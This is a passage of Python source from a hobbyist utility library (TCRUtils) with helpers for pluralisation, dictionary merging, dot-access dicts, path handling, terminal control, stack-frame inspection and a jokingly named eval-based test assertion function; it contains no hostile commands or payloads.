		if word[0].isupper() and word[1:].islower():
			return result[0].upper() + result[1:].lower()
		return result

	return wrapper


irregular_plurals = {
	"child": "children",
	"man": "men",
	"woman": "women",
	"tooth": "teeth",
	"foot": "feet",
	"goose": "geese",
	"mouse": "mice",
	"ox": "oxen",
	"person": "people",
	"die": "dice",
	"criterion": "criteria",
	"phenomenon": "phenomena",
	"cactus": "cacti",
	"focus": "foci",
	"analysis": "analyses",
	"thesis": "theses",
	"crisis": "crises",
	"basis": "bases",
	"stimulus": "stimuli",
	"appendix": "appendices",
	"bacterium": "bacteria",
	"curriculum": "curricula",
	"index": "indices",
	"medium": "media",
	"millennium": "millennia",
	"radius": "radii",
	"memorandum": "memoranda",
	"vertex": "vertices",
	"belief": "beliefs",
	"chief": "chiefs",
	"roof": "roofs",
}


def make_plural(word: str, n: int = 2) -> str:
	"""### Tries its best to convert the word to plural if n != 1 else return the original word."""
	if n == 1:
		return word
	if word.lower() in irregular_plurals:
		return irregular_plurals[word.lower()]
	if word.lower().endswith(("s", "x", "z", "ch", "sh", "o")):
		return word + "es"
	if word.lower().endswith("y") and word[-2] not in "aeiou":
		return word[:-1] + "ies"
	if word.lower().endswith("f"):
		return word[:-1] + "ves"
	if word.lower().endswith("fe"):
		return word[:-2] + "ves"
	return word + "s"


globals()["make_plural"] = _caps_deco(make_plural)


def nth(n: int):
	"""### Return a string containing original number + numeric suffix (st, nd, rd, th).

	Takes into account edge cases like 11, 12.
	Supports negative numbers & zero.

	Examples:
	```py
	>>> nth(1)
	'1st'
	>>> nth(4)
	'4th'
	>>> nth(12)
	'12th'
	```
	"""
	if not isinstance(n, int):
		raise error.NotIntegerError(n)

	if n < 0:
		return "-" + nth(-n)

	if 10 < n % 100 < 14:
		suffix = "th"
	else:
		match n % 10:
			case 1:
				suffix = "st"
			case 2:
				suffix = "nd"
			case 3:
				suffix = "rd"
			case _:
				suffix = "th"

	return str(n) + suffix



class _Getch:
	"""Get a single character from standard input.

	Warning: May behave differently on Unix and Windows
	"""

	def __init__(self):
		try:
			self.impl = _GetchWindows()
		except ImportError:
			self.impl = _GetchUnix()

	def __call__(self):
		"""Get a single character from standard input.

		Warning: May behave differently on Unix and Windows
		"""
		return self.impl()


class _GetchUnix:
	def __init__(self):
		import sys
		import termios
		import tty

		self.sys = sys
		self.termios = termios
		self.tty = tty

	def __call__(self):
		fd = self.sys.stdin.fileno()
		old_settings = self.termios.tcgetattr(fd)
		try:
			self.tty.setraw(self.sys.stdin.fileno())
			ch = self.sys.stdin.read(1)
		finally:
			self.termios.tcsetattr(fd, self.termios.TCSADRAIN, old_settings)
		return ch.encode(encoding="ascii")


class _GetchWindows:
	def __init__(self):
		import msvcrt

		self.msvcrt = msvcrt

	def __call__(self):
		return self.msvcrt.getch()


getch = _Getch()



import contextlib
from collections.abc import Generator, Hashable, Mapping
from typing import Any

from .tcr_compare import isdunder
from .tcr_null import Undefined


def _check_strict(master: Mapping, slave: Mapping, *, recursive: bool) -> bool:
	for k, v in master.items():
		if k not in slave:
			return [k]
		if recursive and isinstance(v, Mapping) and isinstance(slave[k], Mapping):
			if (a := _check_strict(v, slave[k], recursive=recursive)) is not True:
				return [k, *a]
	return True


def dict_zip(dict1: Mapping, *dicts: Mapping) -> Generator[tuple[Hashable, Any], None, None]:
	"""Zips dictionaries simillar to `zip()`, returns a generator which yields a tuple of (key, (value1, value2, value3)) for each key. This function does not support analogy of `zip()` non-strict mode, strict=True is implied (Each key must be in every single passed in dict)."""

	dicks = [dict1, *dicts]

	kys = dicks[0].keys()
	if any(kys != dick.keys() for dick in dicks):
		msg = "Mismatched keys"
		raise ValueError(msg)

	for k, v in dicks[0].items():
		yield (k, (v, *(dick[k] for dick in dicks[1:])))


def merge_dicts(master: Mapping = None, slave: Mapping = None, *dicts: Mapping, recursive=True, strict=False) -> dict:
	"""Merge dictionaries, made to prioritize the `master` dictionary and if key is not found there, then it takes from the `slave` dictionary.

  Optionally if `recursive=True`, then if the same key is a dict in both master and slave, merge dicts operation is performed on both of them.\\
  Optionally if `strict=True` it raises `ValueError` if there exists a key that is in master dictionary but not in slave dictionary.\\
  If there are more than 2 arguments passed in the list is reduced from back to front until two elements are left by the process of merge_dicts(master=list[-2], slave=list[-1])
  """
	merged = {}

	if master is None:
		master = {}
	if slave is None:
		slave = {}

	dicts = [master, slave, *dicts]

	while len(dicts) > 2:
		slave_ = dicts.pop()
		master_ = dicts[-1]
		dicts[-1] = merge_dicts(master_, slave_, recursive=recursive, strict=strict)

	master, slave = dicts

	if strict:
		a = _check_strict(master, slave, recursive=recursive)
		if a is not True:
			msg = f'Strict check failed: there exists a key ({".".join(repr(x) for x in a)}) that is in master dictionary but not in slave dictionary'
			raise ValueError(msg)

	for key in master:
		if key in slave:
			if isinstance(master[key], dict) and isinstance(slave[key], dict) and recursive:
				merged[key] = merge_dicts(master[key], slave[key], recursive=True)
			else:
				merged[key] = master[key]
		else:
			merged[key] = master[key]

	for key in slave:
		if key not in merged:
			merged[key] = slave[key]

	return merged


def clean_dunder_dict(
	__dict__: dict[str, Any],
	strategy: int = 1,
) -> dict:
	"""Filter the __dict__ passed in (or any other str-keyed dict for that matter).

	Strategy types:
	- 0: Remove only __dunder__ keys
	- 1: Do whatever lower-number strategies do but also remove __double_underscore_prefixed keys (default)
	- 2: Do whatever lower-number strategies do but also remove _single_underscore_prefixed keys
	"""

	if strategy == 0:
		return {x: y for x, y in __dict__.items() if not (x.startswith("__") and x.endswith("__"))}

	if strategy == 1:
		return {x: y for x, y in __dict__.items() if not x.startswith("__")}

	if strategy == 2:
		return {x: y for x, y in __dict__.items() if not x.startswith("_")}

	if strategy == -2:
		raise ValueError("Invalid strategy, choose 0, 1 or 2 (not literally `0-2` you fucking idiot)")

	raise ValueError("Invalid strategy, choose 0-2")


class DotDict(dict):
	"""### dot.notation access to dictionary attributes.

	This will ignore any dunder attributes, and will not try to look them up in the underlying dict.

	```py
	>>> d = {"a": 1, "b": 2}
	>>> dd = DotDict(d) # or DotDict({"a": ...})
	>>> dd.a
	1
	>>> dd.b
	2
	```

	This will convert any Mapping that is not already a DotDict into a DotDict on access.

	Raises:
	    - KeyError (tried to convert the dot-access to item-access but failed to find item)
	    - AttributeError (the dot-accessed attribute was dunder, did not try to convert to item-access and said attribute was not found)
	    - Other standard dict errors if any.
	"""

	def __getattr__(self, attr):
		if isdunder(attr):
			return object.__getattribute__(self, attr)

		a = super().__getitem__(attr)

		if not isinstance(a, DotDict) and isinstance(a, Mapping):
			return DotDict(a)

		return a

	def __setattr__(self, attr, value):
		if isdunder(attr):
			return setattr(self, attr, value)

		super().__setitem__(attr, value)

	def __delattr__(self, attr):
		if isdunder(attr):
			return delattr(self, attr)

		super().__delitem__(attr)


class JSDict(dict):
	"""Returns tcr.Undefined when a value is not found rather than erroring.

	In order to effectively replace the undefined value (tcr.Undefined) bitwise or it with any other value, (`tcr.Undefined | T -> T`).
	"""

	def __getitem__(self, key):
		try:
			return super().__getitem__(key)
		except KeyError:
			return Undefined

	def __delitem__(self, __key: Any) -> None:
		with contextlib.suppress(KeyError):
			return super().__delitem__(__key)


class JSDotDict(DotDict, JSDict):
	"""Combines tcr.DotDict and tcr.JSDict.

	(Allows for dot-access and returns tcr.Undefined when a value is not found rather than erroring.)

	For full description see the previously mentioned class doc strings.
	"""



from collections.abc import Iterable
from functools import partial
from re import Match


def _escaper(groups: Iterable[int], match: Match):
	s = ""
	for groupint in groups:
		group = match.group(abs(groupint))
		if groupint < 0:
			group = (type(group), repr(group))
		s += group


handler = partial(_escaper, [1, -2, 3, 4])


class RegexPreset:
	"""Provies documented preset regex patterns."""

	URL = r"((https?):\/\/((?:\S+\.)?([^\/\s]+)?\.([^\/\s]+))\/?(\S+)?)"
	"""Matches any http/https URL

  use `URL.replace('https?', 'your_protocol')` to assert different protocol.

  Groups:
      - `$1` - Entire link
      - `$2` - http/https (will keep the 's' if present, that's its point, or custom protocol if set with instruction above)
      - `$3` - any `subdomains.` (if present), `.domains.` or `.tld`s
      - `$4` - `.domain` (second to last (possibly after . and) before the last .)
      - `$5` - `.tld` (in between the last . and / or end of match)
      - `$6` - part of the link after `/` (not including it, may be `''`)

  https://regex101.com/r/46LZtS/1
  """

	MARKDOWN_HEADING = (r"(^|\n)#{1,3}\s(.|\n|\Z)(.*)", partial(_escaper, [1, -2, 3, 4]))
	"""Used when wanting to remove discord heading markdown from a string. re.sub(*MARKDOWN_HEADING, to_replace)"""


__all__ = ["RegexPreset"]



import os
from collections.abc import Callable
from functools import wraps


def _send(s: str) -> None:
	"""Internal printhook."""
	print(s, end="")


class Cursor:
	def hide(self, *, return_code_only: bool = False) -> None | str:
		a = "\033[?25l"
		if return_code_only:
			return a
		else:
			_send(a)

	def unhide(self, *, return_code_only: bool = False) -> None | str:
		a = "\033[?25h"
		if return_code_only:
			return a
		else:
			_send(a)


class _TerminalSizeTuple(tuple):
	def __new__(cls, width: int, height: int):
		return super().__new__(cls, (width, height))

	def __init__(self, width: int, height: int) -> None:
		self.width = width
		self.height = height

	def __complex__(self):
		return complex(self.width, self.height)

	def __str__(self):
		return f"{self.width}x{self.height}"


class Terminal:
	@property
	def width(self):
		return os.get_terminal_size().columns

	@property
	def height(self):
		return os.get_terminal_size().lines

	@property
	def size(self):
		return _TerminalSizeTuple(*os.get_terminal_size())

	def hide_cursor_during_function(self, func: Callable) -> Callable:
		def wrapper(*args, **kwargs):
			self.cursor.hide()
			r = func(*args, **kwargs)
			self.cursor.unhide()
			return r

		return wrapper

	cursor = Cursor()


terminal = Terminal()

__all__ = ["terminal"]



import inspect
import os
import pathlib as p
import re
from collections.abc import Callable


class path:
	"""Provides path-related utilities."""

	@staticmethod
	def convert_to_relative_path(absolute_path: str | p.Path, relative_to: str | p.Path | None = None, *, walk_up: bool = False) -> p.Path:
		"""Convert absolute path into a relative path."""
		relative_to = relative_to if relative_to is not None else p.Path.cwd()

		absolute_path = p.Path(absolute_path)

		try:
			relative_path = absolute_path.relative_to(relative_to, walk_up=walk_up)
		except ValueError:
			return str(absolute_path)

		return p.Path() / relative_path

	@staticmethod
	def convert_to_relative_pathstr(*args, **kwargs) -> str:
		"""Convert absolute path into a relative path string."""
		converted = path.convert_to_relative_path(*args, **kwargs)
		converted = str(converted)

		if os.name == "nt":
			converted = converted.replace("\\", "/")

		if any(converted.startswith(x) for x in ("\\", "/")):
			return converted
		if os.name == "nt" and ":" in converted:
			return converted

		return f"./{converted}"

	@staticmethod
	def center(path: str | p.Path) -> p.Path:
		"""### Change directory to the location of the passed in __file__ (or any string path or pathlib Path). This will NOT detect if the passed in location is a directory, it will go to parent of it instead. Return previous path as a pathlib.Path object.

		This function is shit use tcr.path.thisdir() instead.
		"""
		a = os.getcwd()
		os.chdir(p.Path(path).resolve().parent)
		return p.Path(a)

	@staticmethod
	def nextname(name="New folder") -> str:
		"""### If passed in name does not end with "`({int})" where `{int}` is any integer, return it with "` (1)`" appended else return it with the previously mentioned `{int}` incremented and leave it otherwise unchanged."""
		match = re.match(r"^(.*) \((\d+)\)$", name)

		if match:
			base_name = match.group(1)
			current_index = int(match.group(2))
			new_name = f"{base_name} ({current_index + 1})"
		else:
			new_name = f"{name} (1)"

		return new_name

	@staticmethod
	def nextname_file_ext_fix(name="New file.txt") -> str:
		match = re.match(r"^(.*?)(?:\s*\((\d+)\))?(?:\.(\w+))?$", name)
		if not match:
			raise ValueError("Invalid filename format")

		base_name, number, extension = match.groups()

		new_number = int(number) + 1 if number else 1

		return f"{base_name} ({new_number}).{extension}" if extension else f"{base_name} ({new_number})"

	@staticmethod
	def newdir(
		name: str | None = None,
		path: p.Path | str | None = None,
		nextname: Callable[[str | None], str] = nextname,
	) -> str:
		"""### Return unused directory or file with the name `name` in directory `path` or the current directory if not passed in."""
		if path is None:
			path = os.getcwd()
		path = str(path)
		listdir = os.listdir(path)
		while name in listdir:
			name = nextname(name)
		return name

	@staticmethod
	def thisdir(*, chdir=False) -> p.Path:
		"""### Return the directory of the furthest back file in the callstack as pathlib.Path, optionally navigate to it with os.chdir()."""
		frames = inspect.stack()
		pth = frames[-1].filename  # Get the filename of the furthest back frame
		pth = p.Path(pth).parent
		if chdir:
			os.chdir(pth)
		return pth

	@staticmethod
	def nt_validname(nt_objname: str | p.Path) -> bool:
		"""### Return True if the passed in `nt_objname` is a valid NT File/Folder/whatever, else return False.

		This does NOT check if the path exists.
		### The passed in path is stripped(), the used one should be as well!
		"""
		if not isinstance(nt_objname, str):
			nt_objname: str = str(nt_objname.absolute().name)

		return bool((all((x not in nt_objname) for x in ("\n", "\r"))) and (nt_objname.strip() not in ("", ".", "..")) and (re.match(r'^[^<>:"\/\\|?*\n]*$', nt_objname.strip())))


__all__ = ["path"]



from builtins import hex as sex  # nocom (actually yescom because this text is a comment dummy!!)
from collections.abc import Iterable, Mapping
from numbers import Number


def hex(number: int, leading_zeroes=2, *, upper=True, prefix: str = "0x") -> str:
	"""Slightly more advanced version of builtin `hex()`, offers ability to choose if uppercase and how many leading zeroes."""
	hex_output = sex(number)
	hex_value = hex_output[2:].zfill(leading_zeroes).upper() if upper else hex_output[2:].zfill(leading_zeroes)

	formatted_output = f"{prefix}{hex_value}"
	if not upper:
		formatted_output = formatted_output.lower()

	return formatted_output


def recursive_sum(it: Iterable) -> int | float:
	s = 0

	for item in it.values() if isinstance(it, Mapping) else it:
		s = s + recursive_sum(item) if isinstance(item, Iterable) else s + item

	return s


def float2int(n: float) -> float | int:
	if round(n) == n:
		return int(n)
	return float(n)


def clamp(min: Number, n: Number, max: Number) -> Number:
	return min if n < min else max if n > max else n  # noqa: FURB136



"""TCRUtils-specific errors."""

from types import TracebackType
from typing import Any


class error:
	class ConfigurationError(ValueError):
		"""Used when a user-provided configuration causes an invalid state."""

	class NotIntegerError(TypeError):
		"""Used when integer was expected but not supplied."""

		def __init__(self, not_integer: Any | None = None, /) -> None:
			s = "Integer was expected."
			if not_integer:
				s += f" Got '{not_integer!r} instead'"
			super().__init__(s)

	class DatabaseError(Exception):
		"""Used when database raises an unexpected exception."""

		def __init__(self) -> None:
			super().__init__()

	class NoMatchingOverloadError(Exception):
		"""Used in tcr.Overload."""


for attr_name, attr_value in error.__dict__.items():
	if not attr_name.startswith("__"):
		globals()[attr_name] = attr_value

__all__ = [x for x in globals() if not x.startswith("_") and x != error.__name__]



import os
from collections.abc import Callable
from dataclasses import dataclass
from functools import partial
from random import randint
from typing import Any, NoReturn

from colored import Back, Fore, Style

from .tcr_compare import able
from .tcr_console import console
from .tcr_extract_error import extract_error
from .tcr_iterable import getattr_queue
from .tcr_print import FMT_BRACKETS, FMTC, fmt_iterable
from .tcr_types import UnreprableString
from .tcr_void import raiser

ASSERTION_ASS = f"{Style.reset}{Fore.GREEN + Style.bold} PASS {Style.reset}"
"""Uh i meant assertion_pass..."""
ASSERTION_FAIL = f"{Style.reset}{Fore.RED + Style.bold} FAIL {Style.reset}"


def default_asshook(obj, result: bool, *, comment: str = "") -> None:
	"""Default assertion hook (hehe)."""

	console(
		obj,
		padding=f" {(ASSERTION_ASS if randint(1, 1000) != 69 else ASSERTION_ASS.replace('PASS', ' ASS')) if result else ASSERTION_FAIL} ",
		printhook=lambda x, **kwargs: print(x + comment, **kwargs),
	)


def total_default_printhook(s: str, failures: int, total: int, *args, **kwargs):
	console(
		f'{s}{" " if total else f"{Fore.RED}{Style.bold}< no tests registered > "}{Fore.RED if failures else Fore.GREEN}{Style.bold}{failures}{FMTC.DECIMAL}/{FMTC.NUMBER}{total}{FMTC._}',
		*args,
		fmt_iterable=lambda a, *_, **__: str(a),
		**kwargs,
	)


@dataclass
class _TestResult:
	result: bool


class _Ass:
	_totals: list[_TestResult]
	error_func: Callable[[Exception, str], None]

	def __init__(self, error_func: Callable[[Exception, str], None] | None = None) -> None:
		self._totals = []
		self.error_func = error_func

	def __call__(
		self,
		a: Any,
		b: Any | bool = True,
		/,
		*,
		expr: str = "a == b",
		assert_first: bool = False,
		msg: str | Callable[[Any], Any] = "Assholertion failed",
		printhook: Callable[[Any, bool], None] = default_asshook,
		suppress: bool = False,
		fmt_iterable_kwrags: dict[str, Any] | None = None,
		**printhook_kwargs: Any,
	) -> None:
		"""### assert with tcr.console.

		# WARNING: this is meant for testing only and uses eval().
		# Do not use in any serious code.
		Also.. imagine showing someone some code and it says 'ass' in it so don't use it for that reason too...

		This uses the assert keyword so it will be optimized out when using optimization flags.

		Args:
		    a: Any, item tested, the one printed
		    b: Any, tiem expected, not printed, only tested against
		    expr: str, the expression used to test a and b (default: 'a == b')
		    assert_first: bool, whether or not to assert first then print (default: False)
		    msg: str, the message passed to assertion error, if it happens to be raised
		    printhook: Callable[[Any, bool], None], the function to be used for printing the object, first argument: the object, second argument: assertion result (default: tcr.console-ish printer)
		    suppress: bool, whether or not to suppress the assertion error and only use the printing functions (default: False)
		"""
		if fmt_iterable_kwrags is None:
			fmt_iterable_kwrags = {"syntax_highlighting": True}

		SH = bool(fmt_iterable_kwrags.get("syntax_highlighting"))

		C_TEXT = "" if not SH else FMTC.ITER_I
		C_RESET = "" if not SH else FMTC._
		C_FUNC = "" if not SH else FMTC.FUNCTION
		C_EXC = "" if not SH else FMTC.INTERNAL_EXCEPTION
		comment = ""

		try:
			result = eval(expr) if isinstance(expr, str) else ((expr(a) == expr(b)) if callable(expr) else raiser(TypeError("Invalid typeof expr: " + str(type(expr))))())
		except Exception as e:
			_revcode = "\x1b[7m"
			comment = f" {C_EXC}{_revcode} {extract_error(e)} {C_RESET}"
			result = False
		finally:
			self._totals.append(_TestResult(result))

		if comment:
			pass
		elif result:
			comment = ""
		elif expr == "a == b" or (able(isinstance, b, expr) and isinstance(b, expr)):
			comment = f" {C_TEXT}({C_RESET}{fmt_iterable(b, **fmt_iterable_kwrags)}{C_TEXT} expected){C_RESET}"
		elif callable(expr):
			comment = f" {C_TEXT}({C_RESET}{C_FUNC}{getattr_queue(expr, '__name__', '__class__.__name__', '__qualname__', default='unknown_callable')}{C_RESET}{FMT_BRACKETS[tuple][SH] % fmt_iterable(b, **fmt_iterable_kwrags)}{C_TEXT} expected){C_RESET}"
		elif isinstance(expr, str):
			comment = f" {C_TEXT}({fmt_iterable(expr, **fmt_iterable_kwrags)}{C_TEXT} expected){C_RESET}"

		printhook_partial = partial(printhook, a, result, comment=comment, **printhook_kwargs)

		if not assert_first:
			printhook_partial()
		if not suppress:
			if callable(self.error_func):
				self.error_func(result, msg)
			else:
				assert result, msg
		if assert_first:
			printhook_partial()

	def total(
		self,
		*,
		prefix: str = "",
		ignore_empty: bool = True,
		printhook: Callable[[str, int, int], None] = total_default_printhook,
		flush: bool = True,
		exit_on_fail: bool = True,
		exit_func: Callable[[int], NoReturn] = os._exit,
	) -> None:
		total = len(self._totals)

		if ignore_empty and not total:
			return

		results1 = [r.result for r in self._totals]
		failures = results1.count(False)
		results = [f"{Fore.GREEN + Style.bold}." if x else f"{Fore.RED + Style.bold}X" for x in results1]
		results = "".join(results) + Style.RESET

		print(prefix, end="")
		printhook(results, failures, total)

		if flush:
			self._totals.clear()

		if exit_on_fail and not all(results1):
			print(extract_error(AssertionError(f"Failed {failures} of {total} tests.")))
			exit_func(1)


ass = _Ass()


def raises(func: Callable[[], None], *args, **kwargs) -> Callable[[BaseException], bool]:
	"""### Double call: raises(func, args, kwargs=)(exception) -> bool.

	Returns a function that takes an exception which in turn returns the result of whether the func raises that exception as a bool.

	This silences any exceptions raised inside of `func`, only returning True or False based on if that exception is e or not (or if no exception return False)

	```py
	>>> raises((lambda x: 1 / x), x=1)(ZeroDivisionError)
	False
	>>> raises((lambda x: 1 / x), x=0)(ZeroDivisionError)
	True
	"""

	def raises_inner(__e: BaseException, /) -> bool:
		try:
			func(*args, **kwargs)
		except __e:
			return True
		except Exception:
			...
		return False

	return raises_inner


class _RAss:
	def __call__(self, func: Callable[[], None], *args, **kwargs) -> Callable[[BaseException], None]:
		def rass_inner(__e: BaseException, /) -> None:
			ass(("Yes, raises", __e) if raises(func, *args, **kwargs)(__e) else ("No, does not raise", __e), expr="a[0].startswith('Yes')")

		return rass_inner


rass = _RAss()



from collections.abc import Callable
from functools import wraps
from typing import Any, NoReturn

from .tcr_void import void


class MayNotReturn:
	"""Denote a return value for a function that may or may not return."""


if True:  # \/ # @trei

	def trei(
		exception: BaseException = Exception,
		excepth: Callable = void,
		els: Callable = void,
		finaly: Callable = void,
	) -> Callable:
		if not issubclass(exception, BaseException):
			msg = f"exception must be an instance of BaseException (got {type(exception)}, {exception})"
			raise TypeError(msg)

		def wrap(func: Callable, exception=exception, excepth=excepth, els=els, finaly=finaly):
			@wraps(func)
			def wrapper(*args, **kwargs):
				try:
					res = func(*args, **kwargs)
				except exception as e:
					excepth(e, *args, **kwargs)
				else:
					els(res, *args, **kwargs)
				finally:
					finaly(*args, **kwargs)

			return wrapper

		return wrap


if True:  # \/ # asert

	def asert(condition_func: Callable, errmsg: str | None = None, *args: Any, **kwargs: Any) -> Any | MayNotReturn:
		if not condition_func(*args, **kwargs):
			if errmsg:
				raise AssertionError(errmsg)
			raise AssertionError



import asyncio as aio
from collections.abc import Callable, Coroutine
from typing import Any, TypeAlias

RunSACAble: TypeAlias = Callable | Coroutine


async def run_sac(func_or_coro: RunSACAble, *args, **kwargs) -> Any:
	"""Run any function, async function or coroutine and return the result."""
	if aio.iscoroutine(func_or_coro):
		if args or kwargs:
			raise ValueError("Invalid arguments when using with coro")
		return await func_or_coro

	if aio.iscoroutinefunction(func_or_coro):
		return await func_or_coro(*args, **kwargs)

	if callable(func_or_coro):
		return func_or_coro(*args, **kwargs)

	msg = "func_or_coro must be a callable or coroutine."
	raise TypeError(msg)



import inspect
import sys
from typing import TypeVar

T = TypeVar("T")


def get_lineno(*, default: T | None = None, backtrack_frames: int = 1) -> int | T:
	"""Return the python file's line number at which this function was called as an int.

	Args:
	  default: Any = None, will be returned if the function's calling place could not be determiend
	  backtrack_frames: int = 1, how many frames to go back in the stack, if set to 1, will return the calling frame's line number, if set to 0 will return this module's internal line number (so dont) but may be useful when building a function that itself makes use of get_lineno() in which case you'd need to make it 2 so your function doesn't just return internal line number
	"""
	frame = inspect.currentframe()
	for _ in range(backtrack_frames):
		if frame is None:
			return default
		frame = frame.f_back
	return frame.f_lineno if frame else default


def get_file_colon_lineno(default: T | None = None, backtrack_frames: int = 1, additional_offset: int = 0) -> str:
	"""Return the python file's line number at which this function was called as a string, in the form 'filename:lineno'.

	Args:
	  default: Any = None, will be returned if the function's calling place could not be determiend
	  backtrack_frames: int = 1, how many frames to go back in the stack, if set to 1, will return the calling frame's line number, if set to 0 will return this module's internal line number (so dont) but may be useful when building a function that itself makes use of get_lineno() in which case you'd need to make it 2 so your function doesn't just return internal line number
	  additional_offset: int = 0, since you cannot easily add to the stringified int, you may set this parameter to offset the returned line number by some amount.
	"""

	frame = inspect.currentframe()
	for _ in range(backtrack_frames):
		if frame is None:
			raise RuntimeError("Invalid frame.")
		frame = frame.f_back

	return f"{frame.f_code.co_filename}:{frame.f_lineno + additional_offset}"


def get_pyversion_str(precision=2) -> str:
	return ".".join([str(x) for x in sys.version_info[:precision]])


class EvalFBackNotFoundError(Exception):
	"""There aren't enough frames in the stack to evaluate the expression in."""


def eval_fback(expr: str, fback_count: int = 2, *, ignore_errors: bool = False, ignore_errors_on_error=None):
	"""Evaluate given expression in the target backframe's globals and locals.

	if ignore_errors is True, will return ignore_errors_on_error instead if there was an error.

	Raise EvalFBackNotEnoughFramesError if there aren't enough frames in the stack to evaluate the expression in.
	"""
	try:
		frame = inspect.currentframe()
		for _ in range(fback_count):
			if frame is None:
				raise EvalFBackNotFoundError("Frame doesn't exist that far back")
			frame = frame.f_back

		if frame is None:
			raise EvalFBackNotFoundError("Frame not found")

		return eval(expr, frame.f_globals, frame.f_locals)
	except Exception:
		if ignore_errors:
			return ignore_errors_on_error
		raise



from typing import Any

from .tcr_iterable import getattr_queue


def get_classname(obj: Any, *, default: str = "UnknownClass") -> str:
	return getattr_queue(obj, "__class__.__name__", default=default)


def get_name_classname(obj: Any, *, default: str = "UnknownClass") -> str:
	return getattr_queue(obj, "__name__", "__class__.__name__", default=default)


def get_qualname_classname(obj: Any, *, default: str = "UnknownClass") -> str:
	return getattr_queue(obj, "__qualname__", "__name__", "__class__.__name__", default=default)



class Every:
	"""Return True every N calls of this instance. Additionally you can look up the total number of calls using `.count` attribute.

	Example:
	```py
	every = Every(10)
	for i in range(100):
	  if every():
	    print(i)
	```
	"""

	count: int
	every: int

	def __init__(self, every: int, *, start: int = 0):
		if every == 0:
			raise ZeroDivisionError("every cannot be zero due to imminent division")
		self.every = every
		self.count = start

	def __call__(self, every: int | None = None) -> bool:
		try:
			return self.count % (every if every is not None else self.every) == 0
		finally:
			self.count += 1



import datetime as dt
from functools import partial

from . import tcr_print as _m_print
from .tcr_int import hex


class BrainfuckCode(str):
	"""Used in tcr.fmt_iterable() in order to format it as Brainfuck code.

	This will filter out all non-brainfuck characters: `>.<[+-],`.

	This can be used outside of fmt_iterable() to filter characters if needed.
	"""

	def __new__(cls, value):
		return super().__new__(cls, "".join(filter(lambda x: x in ">.<[+-],", value)))


class QuotelessString(str):
	"""Used in tcr.fmt_iterable() in order to format it as a plain text, rather than as `"normal str"`."""


class HexInt(int):
	leading_zeroes: int

	def __new__(cls, value, leading_zeroes=None, prefix=None, **kwargs):
		return super().__new__(cls, value, **kwargs)

	def __init__(self, value, *, leading_zeroes=6, prefix="0x", **_):
		self.leading_zeroes = leading_zeroes
		self.prefix = prefix
		super().__init__()

	def __tcr_fmt__(self, fmt_iterable, **kwargs):
		return fmt_iterable(int(self), **{**kwargs, "int_formatter": partial(hex, leading_zeroes=self.leading_zeroes, prefix=self.prefix)})


class UnreprableString(QuotelessString):
	def __repr__(self) -> str:
		return self


class UnixTimestampInt(int):
	"""Add timezone by assinging the tz attribute after instantiation."""

	def __init__(self, *_, **__) -> None:
		self.tz = None
		super().__init__()

	def _get_as_seconds_unix(self) -> int:
		"""Convert this unix timestamp from any type (seconds, miliseconds, microseconds) to the seconds type by dividing by 1000 each time if it's too large to be the seconds variant."""
		i = int(self)

		while i > 99_999_999_999:  # Convert any milisecond or smaller values to seconds
			i //= 1000

		return i

	def __tcr_fmt__(self, fmt_iterable, **kwargs):
		fromtimestamp_value = self._get_as_seconds_unix()

		while fromtimestamp_value > 99_999_999_999:  # Convert any milisecond or smaller values to seconds
			fromtimestamp_value //= 1000

		lhs = fmt_iterable(dt.datetime.fromtimestamp(fromtimestamp_value, tz=self.tz), **kwargs)
		rhs = fmt_iterable([int(self)], **kwargs)

		return f"{lhs} {rhs}"

	def to_datetime(self, tz: dt.tzinfo | None = None) -> dt.datetime:
		"""Evaluate this unix timestamp into a datetime.datetime object."""
		return dt.datetime.fromtimestamp(self._get_as_seconds_unix(), tz=tz)

	def to_int(self):
		"""Forget that this int is a unix timestamp - You may still use this object in place of an int."""
		return int(self)


class GayString(str):
	"""Used in tcr.fmt_iterable() in order to format it as gay str. Happy pride :3"""  # noqa: D400


class AlwaysTruthyStr(str):
	"""A string that always passes an if check no matter the contents."""

	def __bool__(self):
		return True



import time
from collections import OrderedDict
from typing import Any, Self


class Singleton:
	"""Keep single instance at all times.

	## Make sure to put the `tcr.Singleton` inheretance before all others!
	### ❌ `class A(B, tcr.Singleton)`
	### ✅ `class A(tcr.Singleton, B)`

	```py
	class SingleTuple(tcr.Singleton, tuple):
	    ...

	  tup = SingleTuple(('tup1',))
	  tup2 = SingleTuple(('tup2',)) # Those arguments are effectively ignored

	  console(tup)  # -> ('tup1',)
	  console(tup2) # -> ('tup1',)
	```
	"""

	__singleton_instance__ = None

	def __new__(cls, *args, **kwargs) -> Self:
		if cls.__singleton_instance__ is None:
			cls.__singleton_instance__ = super().__new__(cls, *args, **kwargs)
		return cls.__singleton_instance__


class NoInit:
	def __init__(self, *args, **kwargs) -> None:
		msg = "You cannot instiantiate this class"

		if hasattribute(self, "__noinit_msg"):
			msg = str(getattr(self, "__noinit_msg"))

		raise RuntimeError(msg)


def partial_class(_f=None, /, *, add_as_kwargs_to_init: bool = True) -> type:
	"""### Simillarly to functools.partial allows subclasses of decorated class to hold a meta-like state to be later used in e.g. root's init or anywhere else.

	```py
	@tcr.partial_class
	class Button:
	  def __init__(self, label: str):
	    self.label = label

	  def __repr__(self):
	    return f'Button(label={self.label!r})'

	class YesButton(Button, label='Yes'): ...
	class NoButton(Button, label='No'): ...

	y = YesButton()
	c(repr(y)) # -> Button(label='Yes')
	n = NoButton()
	c(repr(n)) # -> Button(label='No')
	n2 = NoButton(label='Nuh uh') # Overridden
	c(repr(n2)) # -> Button(label='Nuh uh')
	```

	Args:
	  add_as_kwargs_to_init: bool = True. If True, the state  will be passed as keyword arguments into `__init__`.
	"""

	def decorator(cls: type) -> type:
		def new_init_subclass(new_cls, **kwargs) -> None:
			new_cls._partial_state = kwargs

			if not add_as_kwargs_to_init:
				return

			original_init = new_cls.__init__

			def new_init(self, *args, **init_kwargs):
				merged_kwargs = {**self._partial_state, **init_kwargs}  # Merge both states such that caller can override it, like functools.partial
				original_init(self, *args, **merged_kwargs)

			new_cls.__init__ = new_init

		cls.__init_subclass__ = classmethod(new_init_subclass)
		return cls

	if _f is not None:
		return decorator(_f)
	return decorator


def hasattribute(obj: object, name: str) -> bool:
	try:
		object.__getattribute__(obj, name)
	except AttributeError:
		return False
	else:
		return True


class DefaultsGetSetItem(dict):
	def __getitem__(self, __key: Any) -> Any:
		try:
			return super().__getitem__(__key)
		except KeyError:
			if hasattribute(self, "defaults") and __key in (defaults := object.__getattribute__(self, "defaults")):
				val = defaults[__key]()
				self[__key] = val
				return val
			else:
				raise


class DefaultsGetItem(dict):
